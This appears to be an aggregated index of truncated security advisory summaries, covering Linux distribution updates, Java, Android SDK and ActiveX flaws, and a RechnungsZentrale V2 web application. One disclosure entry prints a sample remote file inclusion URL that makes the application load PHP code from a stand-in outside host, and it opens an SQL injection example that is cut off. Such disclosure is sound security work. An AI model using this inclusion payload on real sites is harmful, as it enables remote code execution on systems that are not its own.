[SECURITY] Fedora 9 Update: xemacs-packages-extra-20070427-2.fc9

XEmacs is a highly customizable open source text editor and application development system. It is protected under the GNU General Public License and related to other versions of Emacs, in particular GNU Emacs. Its emphasis is on modern graphical user interface support and an open software...

Update Protection against Borland StarTeam Multicast Service HTTP Handling Buffer Overflow Vulnerability

A buffer overflow vulnerability has been reported in Borland StarTeam Multicast Service. Borland StarTeam is a software change and configuration management tool, designed for both centralized and geographically distributed software development environments. A remote attacker might exploit this...

Critical: Red Hat Security Advisory: java-1.5.0-ibm security update

Updated java-1.5.0-ibm packages that fix several security issues are now available for Red Hat Enterprise Linux 4 Extras and 5 Supplementary. This update has been rated as having critical security impact by the Red Hat Security Response Team. IBM's 1.5.0 Java release includes the IBM Java 2 Runti...

Android软件开发工具包BMP文件处理整数溢出漏洞

BUGTRAQ ID: 28006 CVECAN ID: CVE-2008-0986 Android是Google通过Open Handset Alliance发起的项目，用于为移动设备提供完整的软件集，包括操作系统、中间件等。 Android SDK的libsgl.so库中的BMP::readFromStreamStream , ImageDecoder::Mode方式在解析BMP图形文件头时存在整数溢出漏洞，远程攻击者可能利用此漏洞控制用户设备。 如果BMP文件头的offset字段值为负数且Bitmap Information部分（DIB头）指定了8...

Buffer overflow security vulnerabilities in Java Web Start (CVE-2008-1189, CVE-2008-1190)

Unspecified vulnerability in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.216 and earlier allows remote attackers to gain privileges via an untrusted application, a different issue than CVE-2008-1191, aka the "fourth" issue...

Debian Security Advisory DSA 951-2 (trac)

The remote host is missing an update to trac announced via advisory DSA 951-2. This update corrects the search feature in trac, an enhanced wiki and issue tracking system for software development projects, which broke with the last security update. For completeness please find below the original...

Debian Security Advisory DSA 951-1 (trac)

The remote host is missing an update to trac announced via advisory DSA 951-1. Several vulnerabilities have been discovered in trac, an enhanced wiki and issue tracking system for software development projects. The Common Vulnerabilities and Exposures project identifie the following problems:...

Debian Security Advisory DSA 951-1 (trac)

The remote host is missing an update to trac announced via advisory DSA 951-1. Several vulnerabilies have been discovered in trac, an enhanced wiki and issue tracking system for software development projects. The Common Vulnerabilities and Exposures project identifie the following problems:...

Debian: Security Advisory (DSA-951-2)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Debian: Security Advisory (DSA-1152)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Microsoft Visual Studio PDWizard.ocx ActiveX Control Code Execution (CVE-2007-4891)

Microsoft Visual Studio is a software development product for computer programmers. It centers on an integrated development environment which lets programmers create standalone applications, web sites, web applications, and web services.The vulnerability is due to an error in the Microsoft Visual...

CVE-2007-2466

CVE-2007-2466 affects the LDAP Software Development Kit (SDK) for C used in Sun Java System Directory Server 5.2 (up to Patch 4) and Sun ONE Directory Server 5.1. The vulnerability is described as unspecified but enables remote attackers to cause a denial of service (crash) via certain BER encodi...

Tyger Bug Tracking System Multiple Vulnerability

-=--------------------ADVISORY-------------------=- Tyger Bug Tracking System Author: CorryL [email protected] -=-----------------------------------------------=- -=+ Application: Tyger Bug Tracking System -=+ Version: 1.1.3 -=+ Vendor's URL: http://uk.homeunix.org/tyger/cms/ -=+ Platform:...

DSA-1094-1 gforge - missing input sanitising

Bulletin has no description...

W32Dasm buffer overflow vulnerability analysis and exploit-vulnerability warning-the black bar safety net

If you've seen the Black anti - “hack columnist”of the readers, all know the sentence is very classic words: with W32Dasm decompile need to crack the program, and then select the menu“references”-“string reference”, find“invalid registration code, please re-input!” Or“registration code is...

RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion

GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 SQL Injection: User: '...

RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ RechnungsZentrale V2 = 1.1.3 Remote Inclusion Vulnerability ============================================================ - GroundZero Security Research and Software Development...

RechnungsZentrale V2 &lt;= 1.1.3 Remote Inclusion Vulnerability

No description provided by source. - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...

RechnungsZentrale V2 1.1.3 - Remote File Inclusion

RechnungsZentrale V2 1.1.3 - Remote File Inclusion - GroundZero Security Research and Software Development 2006 - Software: RechnungsZentrale V2 Version: 1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ Remote Inclusion:...

[Full-disclosure] RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities

The Advisory can be found here: http://www.g-0.org/code/rz2-adv.html Regards, GroundZero Security Research and Software Development http://www.groundzero-security.com Wir widersprechen der Nutzung oder Ubermittlung unserer Daten fur Werbezwecke oder fur die Markt- oder Meinungsforschung § 28 Abs....